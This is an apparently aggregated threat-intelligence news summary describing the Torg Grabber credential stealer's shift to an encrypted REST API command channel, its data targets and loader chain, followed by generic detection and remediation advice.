New Torg Grabber Stealer Shifts from Telegram to Encrypted REST API C2

Fast Facts

1. Torg Grabber, a rapidly evolving credential stealer, transitioned from Telegram-based exfiltration to a sophisticated, encrypted REST API command-and-control infrastructure within three months, serving multiple criminal clients.
2. The malware targets over 30 browser types and collects sensitive information like credentials, browser extensions, session data, VPN configs, and screenshots, indicating a wide data-harvesting scope.
3. It employs a multi-stage loader chain—initial dropper via fake software or cheats, followed by in-memory, diskless PE payloads using custom syscalls and AES encryption—making detection difficult.
4. investigators advise caution against unofficial downloads, monitoring for suspicious PowerShell activity, BITS transfers, in-memory malware patterns, and irregular browser behavior to prevent infection.

What’s the Problem?

A new credential-stealing malware called Torg Grabber has rapidly evolved over three months, transforming from simple Telegram data exfiltration to a sophisticated encrypted REST API command-and-control infrastructure. It was discovered when a sample, initially mistaken for Vidar Stealer, was analyzed and found to have unique features, such as a custom C2 protocol using ChaCha20 encryption and HMAC-SHA256 authentication. Torg Grabber actively targets credentials from numerous browsers, cryptocurrency wallets, and messaging platforms, collecting a wide array of sensitive data. Its development indicates an organized cybercrime operation serving multiple clients, with at least 40 operator tags linked to Russian-speaking networks. The malware’s complex multi-stage loader chain employs fake software, PowerShell scripts, encrypted payloads, and in-memory execution, making detection challenging. Consequently, security experts advise vigilance against downloads from unofficial sources, suspicious PowerShell commands, and in-memory malware behaviors, emphasizing the importance of monitoring browser security settings and system anomalies to prevent infection.

This report comes from Gen Digital’s Threat Research Team, who analyzed the malware’s binary and detailed its evolution, infrastructure, and operational tactics. They emphasize that the malware’s advancement stems from deliberate development to evade detection and broaden its reach, which explains its adoption of encrypted communications and in-memory payloads. The team notes that multiple criminal actors are operating Torg Grabber, leveraging its scalable architecture to serve diverse illicit purposes. As a result, cybersecurity professionals are urged to reinforce endpoint security measures and remain alert to signs of compromise, especially when dealing with high-value credential theft and targeted credential exfiltration schemes.

Risks Involved

The issue ‘New Torg Grabber Stealer Moves From Telegram Exfiltration to Encrypted REST API C2’ can pose a serious threat to your business. To begin with, this malware shifts from using simple messaging platforms like Telegram to more sophisticated, encrypted web communication channels. As a result, it becomes harder for security systems to detect and block these data transfers. Consequently, sensitive customer data, financial information, or proprietary business details could be stolen without your knowledge. Moreover, this can lead to severe financial losses, legal penalties, and damage to your reputation. Ultimately, if left unchecked, such malware can disrupt operations and erode trust, making cybersecurity an urgent priority for any business.

Possible Action Plan

Timely remediation is crucial to limit the damage caused by malicious activities like the shift of the new Torg Grabber Stealer from Telegram exfiltration to encrypted REST API command-and-control (C2) channels. Prompt action can prevent data theft, reduce operational disruption, and hinder further malware proliferation.

Detection and Analysis

• Conduct thorough threat intelligence gathering to understand the malware’s communication patterns.
• Use network monitoring tools to identify unusual outbound traffic, especially to known malicious endpoints or encrypted channels.
• Perform forensic analysis on affected systems to identify indicators of compromise (IOCs).

Containment

• Isolate infected devices from the network to stop ongoing data exfiltration.
• Disable or block communication with malicious C2 servers and suspicious APIs at network perimeter devices like firewalls and proxies.

Mitigation

• Apply all relevant security patches and updates to vulnerable systems and applications.
• Implement strong access controls and enforce multi-factor authentication to prevent lateral movement.
• Configure intrusion detection and prevention systems (IDPS) to recognize and block known malicious signatures and behaviors.

Remediation

• Remove malware and related artifacts from impacted systems through careful cleanup procedures.
• Reset credentials and regenerate encryption keys if necessary to eliminate hidden access points.
• Restore systems from clean backups, verifying integrity before bringing them back online.

Enhancement & Monitoring

• Strengthen security posture with updated firewall and intrusion rules, focusing on encrypted traffic inspection.
• Deploy or update endpoint detection and response (EDR) solutions to monitor for future malicious activity.
• Continuously review logs and threat intelligence feeds for emerging indicators related to the threat actor’s tactics.

Advance Your Cyber Knowledge

Stay informed on the latest Threat Intelligence and Cyberattacks.

Access world-class cyber research and guidance from IEEE.

Disclaimer: The information provided may not always be accurate or up to date. Please do your own research, as the cybersecurity landscape evolves rapidly. Intended for secondary references purposes only.

Cyberattacks-V1cyberattack-v1-multisource